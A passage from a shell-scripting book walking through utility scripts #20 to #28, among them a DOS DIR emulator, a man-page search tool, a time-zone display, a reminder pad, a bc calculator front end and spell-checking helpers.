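  locatedb="${LOCATEDB:-/var/locate.db}"

  if [ $# -eq 0 ] ; then
    echo "Usage: locate pattern" >&2
    return 1
  fi
  grep -i "$@" "$locatedb"
}
```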
Note There are newer versions of the locate command that take security into consideration. These alternatives
are available as part of the latest Red Hat Linux distribution, and as part of a new secure locate package
called slocate, available for download from http://rpms.arvin.dk/slocate/.

#20 Emulating Another Environment: DIR


While many computer aficionados learned how to work with an operating system within a Unix or Linux environment,
many others started on other systems with other commands and other styles of interaction. It's quite likely that some
users in your organization, for example, are still more comfortable on the MS-DOS command line than they are when
faced with a Unix shell prompt. A set of aliases can be installed to ease the transition a little bit, like mapping the DOS
command D IR to the Unix command ls :
a li as D IR= ls
However, this mapping won't help users if they've already taught themselves that the / W option produces a wide listing
format, because the l s Unix command will just complain that directory / W doesn't exist. Instead, in the same spirit as
wrappers that change the input, the following D IR script can be written to map one style of command flags to another.

The Code
#!/bin/sh

# DIR - Pretends we're the DIR command in DOS and displays the contents
#    of the specified file, accepting some of the standard DIR flags.

function usage
{
cat << EOF >&2
  Usage: $0 [DOS flags] directory or directories
  Where:
   /D           sort by columns
   /H           show help for this shell script
   /N           show long listing format with filenames on right
   /OD          sort by oldest to newest
   /O-D         sort by newest to oldest
   /P           pause after each screenful of information
   /Q           show owner of the file
   /S           recursive listing
   /W           use wide listing format
EOF
  exit 1
}

postcmd=""
flags=""

while [ $# -gt 0 ]
do
  case $1 in
    /D      ) flags="$flags -x"    ;;
    /H      ) usage                ;;
    /[NQW]  ) flags="$flags -l"    ;;
    /OD     ) flags="$flags -rt"   ;;
    /O-D    ) flags="$flags -t"    ;;
    /P      ) postcmd="more"       ;;
    /S      ) flags="$flags -s"    ;;
     *      ) # unknown flag: probably a dir specifier
              break;  # so let's get outta the while loop
  esac
  shift       # processed flag, let's see if there's another
done

# done processing flags, now the command itself:

if [ ! -z "$postcmd" ] ; then
  ls $flags "$@" | $postcmd
else
  ls $flags "$@"
fi

exit 0

How It Works
This script highlights the fact that the conditions in shell case statements are matched as shell patterns (glob-style
wildcards), not just literal strings, which is a useful characteristic. You can see that the DOS flags /N, /Q, and /W all
map, via the single pattern /[NQW], to the same -l Unix flag in the final invocation of the ls command.
Ideally, users would be taught the syntax and options of the Unix environment, but that's not always necessary or
desired. Of course, an interim step could be to have this script echo the ls command with all of the mapped flags
before actually invoking it. Alternatively, you could have this script map the command and then output some message
like Please use ls -l instead.

Running the Code


Name this script DIR, and whenever users type DIR at the command line with typical MS-DOS DIR flags, they'll get
meaningful and useful output rather than a command not found error message.

The Results
$ DIR /OD /S /Volumes/110GB/
total 60680
    0 WEBSITES                       64 Desktop DB
    0 Writing                         0 Temporary Items
    0 Microsoft Office X          29648 Norton FS Volume 2
    0 Documents                   29648 Norton FS Volume
    0 TheVolumeSettingsFolder         0 iTunes Library
    0 Trash                           8 Norton FS Index
  816 Norton FS Data                  0 Desktop Folder
  496 Desktop DF                      0 Desktop Picture Archive
This listing of the specified directory is sorted from oldest to newest and has file sizes indicated (directories always
have a size of 0).

#21 Digging Around in the Man Page Database


The Unix man command has a tremendously useful option that produces a list of man pages whose descriptions
include the specified word. Usually this functionality is accessible as man -k word, but it can also be invoked using
the apropos or whatis commands.
Searching for a word with the man command is helpful, but it's really only half the story, because once you have a set
of matches, you still might find yourself performing a brute-force search for the specific command you want, going one
man page at a time.
As a smarter alternative, this script generates a list of possible man page matches for a particular pattern and then
searches each of those matching pages for a second search pattern. To constrain the output a bit more, it also allows
the user to specify which section of the man pages to search.
Note As a reminder, the man pages are organized by number: 1 = user commands, 3 = library functions, 8 =
administrative tools, and so on. You can use man intro to find out your system's organizational scheme.

The Code
#!/bin/sh

# findman -- Given a specified pattern and man section, shows all the matches
#    for that pattern from within all relevant man pages.

match1="/tmp/$0.1.$$"
matches="/tmp/$0.$$"
manpagelist=""

trap "rm -f $match1 $matches" EXIT

case $#
in
  3 ) section="$1" cmdpat="$2" manpagepat="$3"    ;;
  2 ) section=""   cmdpat="$1" manpagepat="$2"    ;;
  * ) echo "Usage: $0 [section] cmdpattern manpagepattern" >&2
      exit 1
esac

if ! man -k "$cmdpat" | grep "($section" > $match1 ; then
  echo "No matches to pattern \"$cmdpat\". Try something broader?" >&2; exit 1
fi

cut -d\( -f1 < $match1 > $matches     # command names only
cat /dev/null > $match1               # clear the file...

for manpage in $(cat $matches)
do
  manpagelist="$manpagelist $manpage"
  man $manpage | col -b | grep -i $manpagepat | \
    sed "s/^/${manpage}: /" | tee -a $match1
done

if [ ! -s $match1 ] ; then
  cat << EOF
Command pattern "$cmdpat" had matches, but within those there were no
matches to your man page pattern "$manpagepat".
Manpages checked:$manpagelist
EOF
fi

exit 0

How It Works

This script isn't quite as simple as it may seem at first glance. It uses the fact that commands issue a return code
depending on the result of their execution to ascertain whether there are any matches to the cmdpat value. The
return code of the grep command in the following line of code is what's important:
if ! man -k "$cmdpat" | grep "($section" > $match1 ; then
If grep fails to find any matches, it returns a nonzero return code. Therefore, without even having to see if $match1
is a nonzero-sized output file, the script can ascertain the success or failure of the grep command. This is a much
faster way to produce the desired results.
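The underlying rule is that a pipeline's exit status is that of its last command, so grep's verdict can drive the if directly. A minimal sketch:

```shell
#!/bin/sh
# grep returns 0 when it finds a match and nonzero otherwise, so its
# success or failure can steer the if without any temp-file size test.
if ! printf 'alpha\nbeta\n' | grep 'gamma' > /dev/null ; then
  echo "no match found"
fi
```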
Each resultant line of output in $match1 has a format shared with the following line:
httpd                (8)  - Apache hypertext transfer protocol server
The cut -d\( -f1 sequence grabs from each line of output the command name up through the open parenthesis,
discarding the rest of the output. Once the list of matching command names has been produced, the man page for
each command is searched for the manpagepat. To search man pages, however, the embedded display formatting
(which otherwise would produce boldface text) must be stripped, which is the job of col -b.
To ensure that a meaningful error message is generated in the case where there are man pages for commands that
match the cmdpat specified, but manpagepat does not occur within those man pages, the following line of code
copies the output into a temp file ($match1) as it's streamed to standard output:
sed "s/^/${manpage}: /" | tee -a $match1
Then if the ! -s test shows that the $match1 output file has zero lines, the error message is displayed.

Running the Script


To search within a subset of man pages for a specific pattern, first specify the keyword or pattern to determine which
man pages should be searched, and then specify the pattern to search for within the resulting man page entries. To
further narrow the search to a specific section of man pages, specify the section number as the first parameter.

The Results
Finding references in the man page database to the httpd.conf file is problematic with the standard Unix toolset.
On systems with Perl installed, you'll find a reference to a Perl module:
$ man -k httpd.conf
Apache::httpd_conf(3)  - Generate an httpd.conf file
But almost all Unixes without Perl return either "nothing appropriate" or nothing at all. Yet httpd.conf is definitely
referenced within the man page database. The problem is, man -k checks only the one-line summaries of the
commands, not the entire man pages (it's not a full-text indexing system).
But this failure of the man command is a great example of how the findman script proves useful for just this sort of
needle-in-a-haystack search. To search all man pages in section 8 (Administration) that have something to do with
Apache, in addition to mentioning httpd.conf specifically, you would use the following command, with the results
showing the exact matches in both relevant man pages, apxs and httpd:
$ findman 8 apache httpd.conf
apxs: [activating module `foo' in /path/to/apache/etc/httpd.conf]
apxs: Apache's httpd.conf configuration file, or by
apxs: httpd.conf configuration file without attempt
apxs: the httpd.conf file accordingly. This can be achieved by
apxs: [activating module `foo' in /path/to/apache/etc/httpd.conf]
apxs: [activating module `foo' in /path/to/apache/etc/httpd.conf]
httpd: ServerRoot. The default is conf/httpd.conf.
httpd: /usr/local/apache/conf/httpd.conf
Searching just within section 8 quickly identified two man pages worth exploring for information about the
httpd.conf file. Yet searching across all man pages in the system is just as easy:
$ findman apache .htaccess
mod_perl: In an httpd.conf <Location /foo> or .htaccess you need:
mod_perl: dlers are not allowed in .htaccess files.

#22 Displaying the Time in Different Time Zones


The most fundamental requirement for a working date command is that it display the date and time in your time zone.
But what if you have users across multiple time zones? Or, more likely, what if you have friends and colleagues in
different locations, and you're always confused about what time it is in, say, Casablanca, Vatican City, or Sydney?
It turns out that most modern Unixes have a date command built atop an amazing time zone database. Usually stored
in /usr/share/zoneinfo, this database lists over 250 different regions and knows how to ascertain the
appropriate time zone for each. Because the date command pays attention to the TZ time zone variable, and because
that variable can be set to any known region, the core functionality can be demonstrated as follows:
$ TZ="Africa/Casablanca" date
Mon Dec  2 16:31:01 WET 2002
However, using a shell script, we can create a more user-friendly front end to the time zone database: Specifying
temporary environment variable settings isn't something most system users are comfortable doing!

The Code
#!/bin/sh

# timein - Shows the current time in the specified time zone or
#   geographic zone. Without any argument, shows UTC/GMT. Use
#   the word "list" to see a list of known geographic regions.
#   Note that it's possible to match zone directories (regions),
#   but that only time zone files (cities) are valid specifications.

# Time zone database ref: http://www.twinsun.com/tz/tz-link.htm

zonedir="/usr/share/zoneinfo"

if [ ! -d $zonedir ] ; then
  echo "No time zone database at $zonedir." >&2 ; exit 1
fi

if [ -d "$zonedir/posix" ] ; then
  zonedir=$zonedir/posix        # modern Linux systems
fi

if [ $# -eq 0 ] ; then
  timezone="UTC"
  mixedzone="UTC"
elif [ "$1" = "list" ] ; then
  ( echo "All known time zones and regions defined on this system:"
    cd $zonedir
    find * -type f -print | xargs -n 2 | \
      awk '{ printf "  %-38s %-38s\n", $1, $2 }'
  ) | more
  exit 0
else
  region="$(dirname $1)"
  zone="$(basename $1)"

  # Is it a direct match? If so, we're good to go. Otherwise we need
  # to dig around a bit to find things. Start by just counting matches.

  matchcnt="$(find $zonedir -name $zone -type f -print |
        wc -l | sed 's/[^[:digit:]]//g' )"

  if [ "$matchcnt" -gt 0 ] ; then       # at least one file matches
    if [ $matchcnt -gt 1 ] ; then      # more than one file matches
      echo "\"$zone\" matches more than one possible time zone record." >&2
      echo "Please use 'list' to see all known regions and time zones" >&2
      exit 1
    fi

    match="$(find $zonedir -name $zone -type f -print)"

    mixedzone="$zone"
  else
    # First letter capitalized, rest of word lowercase for region + zone
    mixedregion="$(echo ${region%${region#?}} | tr '[[:lower:]]' '[[:upper:]]')\
$(echo ${region#?} | tr '[[:upper:]]' '[[:lower:]]')"
    mixedzone="$(echo ${zone%${zone#?}} | tr '[[:lower:]]' '[[:upper:]]')\
$(echo ${zone#?} | tr '[[:upper:]]' '[[:lower:]]')"

    if [ "$mixedregion" != "." ] ; then
      # Only look for specified zone in specified region
      # to let users specify unique matches when there's more than one
      # possibility (e.g., "Atlantic")
      match="$(find $zonedir/$mixedregion -type f -name $mixedzone -print)"
    else
      match="$(find $zonedir -name $mixedzone -type f -print)"
    fi

    if [ -z "$match" ] ; then   # no file matches specified pattern
      if [ ! -z $(find $zonedir -name $mixedzone -type d -print) ] ; then
        echo \
"The region \"$1\" has more than one time zone. Please use 'list'" >&2
      else      # just not a match at all
        echo "Can't find an exact match for \"$1\". Please use 'list'" >&2
      fi
      echo "to see all known regions and time zones." >&2
      exit 1
    fi
  fi
  timezone="$match"
fi

nicetz=$(echo $timezone | sed "s|$zonedir/||g")     # pretty up the output

echo It\'s $(TZ=$timezone date '+%A, %B %e, %Y, at %l:%M %p') in $nicetz

exit 0

How It Works
This script exploits the ability of the date command to show the date and time for a specified time zone, regardless of
your physical location. In fact, the entire script is all about identifying a valid time zone name so that the date
command will work when invoked at the very end.
Most of the complexity of this script comes from trying to anticipate names of world regions entered by users that do
not match the names of regions in the time zone database. The time zone database is laid out with timezonename and
region/locationname columns, and the script tries to display useful error messages for typical input problems.
For example, although TZ="Casablanca" date would fail to find a matching region, and the date command
would instead display GMT (Greenwich Mean Time, more properly known as Universal Time Coordinated), the city
Casablanca does exist in the time zone database. The proper region name, Africa/Casablanca, was shown in the
introduction to this script. And this script can find Casablanca in the Africa directory and identify the zone accurately.
Specify "Africa," on the other hand, and the script knows that there are subregions and specifies that the information is
insufficient to uniquely identify a specific time zone.
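The capitalization trick in the script's else branch is worth a closer look. Here is a minimal standalone sketch of the same parameter-expansion idiom (the variable names are mine, not the script's): ${word%${word#?}} yields the first character of the word, and ${word#?} everything after it.

```shell
# Sketch of the capitalization idiom used by timein (illustrative names):
# ${word%${word#?}} strips "all but the first char" from the end, leaving
# just the first character; ${word#?} is the remainder of the word.
word="casaBLANCA"
first="$(echo ${word%${word#?}} | tr '[:lower:]' '[:upper:]')"
rest="$(echo ${word#?} | tr '[:upper:]' '[:lower:]')"
mixed="$first$rest"
echo "$mixed"    # casaBLANCA becomes Casablanca
```

This is how a lowercase (or oddly cased) user entry like "casablanca" gets normalized into the Casablanca filename actually stored in the zoneinfo directory.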
Finally, you can also use a time zone name (e.g., UTC or WET) as an argument to this script to see a subset of time
zones that are defined.
Note An excellent reference to the time zone database can be found online, at
http://www.twinsun.com/tz/tz-link.htm

Running the Script


To find the time in a specified region or city, specify the region or city name as the argument to the command. If you
know both the region and the city, you can specify them as region/city, as in Pacific/Yap. Without any arguments,
timein shows Greenwich Mean Time/Universal Time Coordinated (GMT/UTC).

The Results

$ timein
It's Friday, March 28, 2003, at 2:58 AM in UTC
$ timein London
It's Friday, March 28, 2003, at 2:58 AM in Europe/London
$ timein Brazil
The region "Brazil" has more than one time zone. Please use 'list'
to see all known regions and time zones.
$ timein Pacific/Honolulu
It's Thursday, March 27, 2003, at 4:58 PM in Pacific/Honolulu
$ timein WET
It's Friday, March 28, 2003, at 3:58 AM in WET
$ timein mycloset
Can't find an exact match for "mycloset". Please use 'list'
to see all known regions and time zones.

Chapter 3: Creating Utilities


In many ways, the main purpose of scripting in command shells is to take complex command-line scripts and drop
them into files, making the scripts replicable and easily tweaked and tuned to fit specific purposes. It should be no
surprise, then, that user commands sprawl across two chapters in Wicked Cool Shell Scripts. What's surprising is that I
haven't written a wrapper for, or otherwise tweaked and tuned the behavior of, every single command on my Linux,
Solaris, and Mac OS X systems.
Which leads to a very interesting observation about the power and flexibility of Unix. Unix is the only major operating
system where you can decide that you don't like the default flags of a command and fix them forever with just a few
keystrokes, or where you can emulate the behavior of your favorite utility from another version of the operating system
with a dozen lines of scripting. That's what makes Unix so tremendously fun and what provoked the creation of this
book in the first place.

#23 A Reminder Utility


Windows and Mac users for years have appreciated simple utilities like Stickies and Post-It, streamlined applications
that let you have tiny reminder windows stuck on your screen. They're a perfect place to jot down a phone number or
other reminder. If you're at the Unix command line, there's nothing analogous, yet the problem is quite easily solved, as
shown in this pair of scripts.
The first script, remember, lets you easily file random snippets of information into a file. If invoked without any
arguments, it reads standard input until the end of the file, and if invoked with arguments, it saves those arguments to
the data file instead.
The other half of this duo is remindme, a companion shell script that either displays the contents of the
rememberfile if no arguments are given or, if an argument is given, searches in this file for the specified pattern.

The Code
#!/bin/sh

# remember - An easy command-line-based memory pad.

rememberfile="$HOME/.remember"

if [ $# -eq 0 ] ; then
  echo "Enter note, end with ^D: "
  cat - >> $rememberfile
else
  echo "$@" >> $rememberfile
fi
exit 0

Here's the second script, remindme:

#!/bin/sh

# remindme - Searches a data file for matching lines, or shows the entire
#   contents of the data file if no argument is specified.

rememberfile="$HOME/.remember"

if [ $# -eq 0 ] ; then
  more $rememberfile
else
  grep -i "$@" $rememberfile | ${PAGER:-more}
fi
exit 0

Running the Scripts

To use the remindme utility, first add notes, phone numbers, or anything else to the rememberfile with the
remember script. Then search this freeform database with remindme, specifying as long or short a pattern as you'd
like.

The Results
$ remember
Enter note, end with ^D:
The Boulder Community Network: http://bcn.boulder.co.us/
^D
Then, when I want to remember that note, months later:
$ remindme boulder
The Boulder Community Network: http://bcn.boulder.co.us/
Or if I need any other data that might be in there:
$ remindme 800
Southwest Airlines: 800-IFLYSWA

Hacking the Script


While certainly not any sort of shell script programming tour de force, these scripts neatly demonstrate the incredible
extensibility of the Unix command line. If you can envision something, the odds are good that there's a simple and
straightforward way to accomplish it.
These scripts could be improved in any number of ways. For instance, you could create the concept of records such
that each record is time-stamped and multiline input is saved as a single entity that can be searched with a regular
expression, which would enable you to store phone numbers for a group of people and retrieve them all by
remembering the name of only one person in the group. If you're really into scripting, you might also want to include
edit and delete capabilities. Then again, it's pretty easy to edit the ~/.remember file by hand.
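As a starting point for the time-stamping idea, here's one way such a record might be written. The function name remember_ts and the REMEMBERFILE override are invented for this sketch; they are not part of the book's scripts.

```shell
# remember_ts - a hypothetical timestamped variant of 'remember'.
# REMEMBERFILE lets a caller redirect the data file (handy for testing);
# by default it falls back to the same ~/.remember file used above.
remember_ts()
{
  rememberfile="${REMEMBERFILE:-$HOME/.remember}"
  echo "[$(date '+%Y-%m-%d %H:%M')] $*" >> "$rememberfile"
}

# usage: remember_ts call the dentist about Thursday
```

With every entry carrying a date stamp, remindme could then be extended to filter by date as well as by pattern.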

#24 An Interactive Calculator


Once I wrote Script #9, allowing command-line invocations of bc for floating-point calculations, it was inevitable that I'd
write a small wrapper script to create an interactive command-line-based calculator. What's remarkable is that, even
with help information, it's very short.

The Code
#!/bin/sh

# calc - A command-line calculator that acts as a frontend to bc.

scale=2

show_help()
{
cat << EOF
  In addition to standard math functions, calc also supports
  a % b       remainder of a/b
  a ^ b       exponential: a raised to the b power
  s(x)        sine of x, x in radians
  c(x)        cosine of x, x in radians
  a(x)        arctangent of x, returns radians
  l(x)        natural log of x
  e(x)        exponential log of raising e to the x
  j(n,x)      bessel function of integer order n of x
  scale N     show N fractional digits (default = 2)
EOF
}

if [ $# -gt 0 ] ; then
  exec scriptbc "$@"
fi

echo "Calc - a simple calculator. Enter 'help' for help, 'quit' to quit."
echo -n "calc> "

while read command args
do
  case $command
  in
    quit|exit) exit 0                                    ;;
    help|\?)   show_help                                 ;;
    scale)     scale=$args                               ;;
    *)         scriptbc -p $scale "$command" "$args"     ;;
  esac

  echo -n "calc> "
done

echo ""

exit 0

How It Works
There's really remarkably little of a complex nature going on here. Perhaps the most interesting part of the code is the
while read statement, which creates an infinite loop that displays the calc> prompt until the user exits, either by
typing quit or entering an end-of-file sequence (^D). And, of course, the simplicity of this script is exactly what
makes it wonderful: Shell scripts don't need to be extremely complex to be useful!

Running the Script


This script is easily run because by default it's an interactive tool that prompts the user for the desired actions. If it is
invoked with arguments, those arguments are passed to the scriptbc command instead.

The Results
$ calc 150 / 3.5
42.85
$ calc
Calc - a simple calculator. Enter 'help' for help, 'quit' to quit.
calc> help
  In addition to standard math functions, calc also supports
  a % b       remainder of a/b
  a ^ b       exponential: a raised to the b power
  s(x)        sine of x, x in radians
  c(x)        cosine of x, x in radians
  a(x)        arctangent of x, returns radians
  l(x)        natural log of x
  e(x)        exponential log of raising e to the x
  j(n,x)      bessel function of integer order n of x
  scale N     show N fractional digits (default = 2)
calc> 54354 ^ 3
160581137553864
calc> quit
$

#25 Checking the Spelling of Individual Words


High-end programs like StarOffice, OpenOffice.org, and Microsoft Word include built-in spell-checking software, but the
more rudimentary command-line question of whether a single word is spelled correctly or not is beyond the ability of any
of these applications.
Similarly, most Unixes include a spell-check package that works reasonably well, albeit with a crusty interface. Given
an input file or data stream, the packages generate a long list of all possible misspellings. Some spell-check packages
include interactive spell-check applications. Again, however, none of them offer a simple way to check the spelling of a
single word.
Don't have a spell-check program installed? For those Unix distributions that don't have a spell
package (though, really, all of 'em should nowadays, with disk space so cheap), an
excellent option is to install ispell, from
http://fmgwww.cs.ucla.edu/geoff/ispell.html

The Code
#!/bin/sh

# checkspelling - Checks the spelling of a word.

spell="ispell -l"       # if you have ispell installed
                        # if not, just define spell=aspell or equivalent

if [ $# -lt 1 ] ; then
  echo "Usage: $0 word or words" >&2 ; exit 1
fi

for word
do
  if [ -z "$(echo $word | $spell)" ] ; then
    echo "$word: spelled correctly."
  else
    echo "$word: misspelled."
  fi
done
exit 0

Running the Script


To use this script, simply specify one or more words as arguments of the checkspelling command.

The Results
It's now easy to ascertain the correct spelling of "their":
$ checkspelling thier their
thier: misspelled.
their: spelled correctly.

Hacking the Script


There's quite a bit you can do with a spelling utility and, for that matter, quite a bit that ispell can already
accomplish. This is just the tip of the proverbial iceberg, as you'll see in the next script.

#26 Shpell: An Interactive Spell-Checking Facility


Checking the spelling of something word by word is useful, but more commonly you'll want to check all of the words in
a file en masse. You can do that with ispell, if you've installed it, but ispell has an interface that some people
find baffling. And if you don't have ispell, many of the more rudimentary spell-checking packages don't offer much
more sophistication than simple "Is this word right?" functionality. Therefore, in either case, an alternative approach to
checking and fixing all of the spelling errors throughout a file might be just what you need, and it's easily accomplished
with this shell script.

The Code
#!/bin/sh

# shpell - An interactive spell-checking program that lets you step
#   through all known spelling errors in a document, indicate which
#   ones you'd like to fix and how, and apply the changes to the file.
#   The original version of the file is saved with a .shp suffix,
#   and the new version replaces the old.
#
# Note that you need a standard 'spell' command for this to work, which
# might involve installing aspell, ispell, or pspell on your system.

tempfile="/tmp/$0.$$"
changerequests="/tmp/$0.$$.sed"
spell="ispell -l"               # modify as needed for your own spell

trap "rm -f $tempfile $changerequests" EXIT HUP INT QUIT TERM

# Include the ansi color sequence definitions
. script-library.sh
initializeANSI

getfix()
{
  # Asks the user to specify a correction. If the user enters a replacement word
  # that's also misspelled, the function calls itself, which is a level 2 nesting.
  # This can go as deep as the user might need, but keeping track of nesting enables
  # us to ensure that only level 1 outputs the "replacing word" message.

  word=$1
  filename=$2
  misspelled=1

  while [ $misspelled -eq 1 ]
  do
    echo "" ; echo "${boldon}Misspelled word ${word}:${boldoff}"
    grep -n $word $filename |
      sed -e 's/^/  /' -e "s/$word/$boldon$word$boldoff/g"
    echo -n "i)gnore, q)uit, or type replacement: "
    read fix

    if [ "$fix" = "q" -o "$fix" = "quit" ] ; then
      echo "Exiting without applying any fixes." ; exit 0
    elif [ "${fix%${fix#?}}" = "!" ] ; then
      misspelled=0      # user forcing replacement, stop checking
      echo "s/$word/${fix#?}/g" >> $changerequests
    elif [ "$fix" = "i" -o -z "$fix" ] ; then
      misspelled=0
    else
      if [ ! -z "$(echo $fix | sed 's/[^ ]//g')" ] ; then
        misspelled=0    # once we see spaces, we stop checking
        echo "s/$word/$fix/g" >> $changerequests
      else
        # It's a single-word replacement, let's spell-check the replacement too
        if [ ! -z "$(echo $fix | $spell)" ] ; then
          echo ""
          echo "*** Your suggested replacement $fix is misspelled."
          echo "*** Preface the word with '!' to force acceptance."
        else
          misspelled=0  # suggested replacement word is acceptable
          echo "s/$word/$fix/g" >> $changerequests
        fi
      fi
    fi
  done
}

### Beginning of actual script body

if [ $# -lt 1 ] ; then
  echo "Usage: $0 filename" >&2 ; exit 1
fi
if [ ! -r $1 ] ; then
  echo "$0: Cannot read file $1 to check spelling" >&2 ; exit 1
fi

# Note that the following invocation fills $tempfile along the way

errors="$($spell < $1 | tee $tempfile | wc -l | sed 's/[^[:digit:]]//g')"

if [ $errors -eq 0 ] ; then
  echo "There are no spelling errors in $1." ; exit 0
fi

echo "We need to fix $errors misspellings in the document. Remember that the"
echo "default answer to the spelling prompt is 'ignore', if you're lazy."

touch $changerequests

for word in $(cat $tempfile)
do
  getfix $word $1 1
done

if [ $(wc -l < $changerequests) -gt 0 ] ; then
  sed -f $changerequests $1 > $1.new
  mv $1 $1.shp
  mv $1.new $1
  echo Done. Made $(wc -l < $changerequests) changes.
fi

exit 0

How It Works
The script itself revolves around the getfix function, which shows each error in its context and then prompts the
user for either a correction or permission to ignore each error. The sophisticated conditionals in this script allow users to
type in either a correction for the reported misspelling, i to ignore the misspelling, or q to immediately quit the
program. Perhaps more interesting is that getfix is interactive. It checks the spelling of the corrections that are
entered to ensure that you're not trading one misspelling for another. If the script thinks that the correction is a
misspelling too, you can force acceptance of the correction by prefacing it with the "!" character.
The fixes themselves are accumulated by a sed script called $changerequests, which is then used to apply the
corrections to the file once the user has finished reviewing all of the would-be mistakes.
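The change-request mechanism is easy to see in isolation. This sketch (the substitutions are made up for illustration) accumulates fixes one per line, exactly as getfix does, then applies them all in a single sed pass:

```shell
# Collect sed substitutions in a file, then apply them all at once,
# the same way shpell applies its accumulated corrections.
changerequests="/tmp/changes.$$"
echo 's/teh/the/g'  > "$changerequests"
echo 's/adn/and/g' >> "$changerequests"
fixed="$(echo 'teh cat adn teh dog' | sed -f "$changerequests")"
echo "$fixed"    # the cat and the dog
rm -f "$changerequests"
```

Deferring all edits to one batch pass means the source file is never touched until the user has finished reviewing every reported misspelling.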
Also worth mentioning is that the trap command at the beginning of the script ensures that any temp files are
removed. Finally, if you check the last few lines of the script, you'll note that the precorrected version of the file is saved
with a .shp suffix, in case something goes wrong. Anticipating possible problems is always a wise policy, particularly
for scripts that munge input files.
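The trap-based cleanup is a pattern worth copying into your own scripts. A minimal demonstration (run in a subshell here so the EXIT trap actually fires; the file and message are illustrative only):

```shell
# An EXIT trap removes the temp file no matter how the shell terminates,
# whether by normal exit or an interrupting signal.
tempfile="/tmp/trapdemo.$$"
sh -c "trap 'rm -f $tempfile' EXIT HUP INT QUIT TERM; echo scratch > $tempfile; exit 0"
# by the time the subshell has exited, the trap has already removed $tempfile
```

Without the trap, a user pressing ^C mid-session would leave stale files accumulating in /tmp.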

Running the Script


To run this script, specify the filename to spell-check as a command argument.

The Results

$ shpell ragged.txt
We need to fix 5 misspellings in the document. Remember that the
default answer to the spelling prompt is 'ignore', if you're lazy.
Misspelled word herrself:
  1:So she sat on, with closed eyes, and half believed herrself in
i)gnore, q)uit, or type replacement: herself
Misspelled word reippling:
  3:all would change to dull reality--the grass would be only rustling in the
  wind, and the pool reippling to the waving of the reeds--the
i)gnore, q)uit, or type replacement: rippling
Misspelled word teacups:
  4:rattling teacups would change to tinkling sheep-bells, and the
i)gnore, q)uit, or type replacement:
Misspelled word Gryphon:
  7:of the baby, the shriek of the Gryphon, and all the other queer noises, would
  change (she knew)
i)gnore, q)uit, or type replacement:
Misspelled word clamour:
  8:to the confused clamour of the busy farm-yard--while the lowing of
i)gnore, q)uit, or type replacement:
Done. Made 2 changes.
It's impossible to reproduce here in the book, but the ANSI color sequences let the misspelled words stand out in the
output display.

#27 Adding a Local Dictionary to Spell


Missing in both Script #25 and Script #26, and certainly missing in most spell-check implementations on stock Unix
distributions, is the ability for a user to add words to a personal spelling dictionary so that they're not flagged over and
over again. Fortunately, adding this feature is straightforward.

The Code
#!/bin/sh

# spelldict - Uses the 'aspell' feature and some filtering to allow easy
#   command-line spell-checking of a given input file.

# Inevitably you'll find that there are words it flags as wrong but
# you think are fine. Simply save them in a file, one per line, and
# ensure that the variable 'okaywords' points to that file.

okaywords="$HOME/.okaywords"
tempout="/tmp/spell.tmp.$$"
spell="aspell"          # tweak as needed

trap "/bin/rm -f $tempout" EXIT

if [ -z "$1" ] ; then
  echo "Usage: spell file|URL" >&2; exit 1
elif [ ! -f $okaywords ] ; then
  echo "No personal dictionary found. Create one and rerun this command" >&2
  echo "Your dictionary file: $okaywords" >&2
  exit 1
fi

for filename
do
  $spell -a < $filename | \
    grep -v '@(#)' | sed "s/\'//g" | \
    awk '{ if (length($0) > 15 && length($2) > 2) print $2 }' | \
    grep -vif $okaywords | \
    grep '[[:lower:]]' | grep -v '[[:digit:]]' | sort -u | \
    sed 's/^/  /' > $tempout

  if [ -s $tempout ] ; then
    sed "s/^/${filename}: /" $tempout
  fi
done

exit 0

How It Works
Following the model of the Microsoft Office spell-checking feature, this script not only supports a user-defined dictionary
of correctly spelled words that the spell-checking program would otherwise think are wrong, it also ignores words that
are in all uppercase (because they're probably acronyms) and words that contain a digit.
This particular script is written to use aspell, which interprets the -a flag to mean that it's running in pass-through
mode, in which it reads stdin for words, checks them, and outputs only those that it believes are misspelled. The
ispell command also requires the -a flag, and many other spell-check commands are smart enough to
automatically ascertain that stdin isn't the keyboard and therefore should be scanned. If you have a different
spell-check utility on your system, read the man page to identify which flag or flags are necessary.
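Those two ignore rules are implemented by the pair of grep tests near the end of the pipe. Here they are in isolation (the sample words are mine, chosen to trip each rule):

```shell
# Keep only words that contain at least one lowercase letter (this drops
# likely acronyms such as NASA) and no digits (this drops tokens like mp3).
kept="$(printf 'NASA\nmp3\nclamour\n' | grep '[[:lower:]]' | grep -v '[[:digit:]]')"
echo "$kept"    # clamour
```

The grep -vif $okaywords step earlier in the pipe works the same way, except the patterns to exclude come from the user's personal dictionary file rather than a character class.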

Running the Script


This script requires one or more filenames to be specified on the command line.

The Results

First off, with an empty personal dictionary and the excerpt from Alice in Wonderland seen previously, here's what
happens:
$ spelldict ragged.txt
ragged.txt:   herrself
ragged.txt:   teacups
ragged.txt:   Gryphon
ragged.txt:   clamour
Two of those are not misspellings, so I'm going to add them to my personal spelling dictionary by using the echo
command to append them to the okaywords file:
$ echo "Gryphon" >> ~/.okaywords
$ echo "teacups" >> ~/.okaywords
Here are the results of checking the file with the expanded spelling dictionary:
$ spelldict ragged.txt
ragged.txt:   herrself
ragged.txt:   clamour

#28 Converting Temperatures


This script works with a variety of mathematical formulas, and an unusual input format, to translate between
Fahrenheit, Celsius, and Kelvin. It's the first use of sophisticated mathematics within a script in this book, and you'll see
where the experimentation in Script #9 that produced scriptbc proves a tremendous boon, as the same concept of
piping an equation to bc shows up again here.

The Code
#!/bin/sh

# convertatemp - Temperature conversion script that lets the user enter
#   a temperature in Fahrenheit, Celsius, or Kelvin and receive the
#   equivalent temperature in the other two units as the output.

if [ $# -eq 0 ] ; then
  cat << EOF >&2
Usage: $0 temperature[F|C|K]
where the suffix:
   F    indicates input is in Fahrenheit (default)
   C    indicates input is in Celsius
   K    indicates input is in Kelvin
EOF
  exit 1
fi

unit="$(echo $1|sed -e 's/[-[[:digit:]]*//g' | tr '[:lower:]' '[:upper:]')"
temp="$(echo $1|sed -e 's/[^-[[:digit:]]*//g')"

case ${unit:=F}
in
  F ) # Fahrenheit to Celsius formula: Tc = (F - 32) / 1.8
    farn="$temp"
    cels="$(echo "scale=2; ($farn - 32) / 1.8" | bc)"
    kelv="$(echo "scale=2; $cels + 273.15" | bc)"
    ;;
  C ) # Celsius to Fahrenheit formula: Tf = (9/5)*Tc + 32
    cels=$temp
    kelv="$(echo "scale=2; $cels + 273.15" | bc)"
    farn="$(echo "scale=2; ((9/5) * $cels) + 32" | bc)"
    ;;
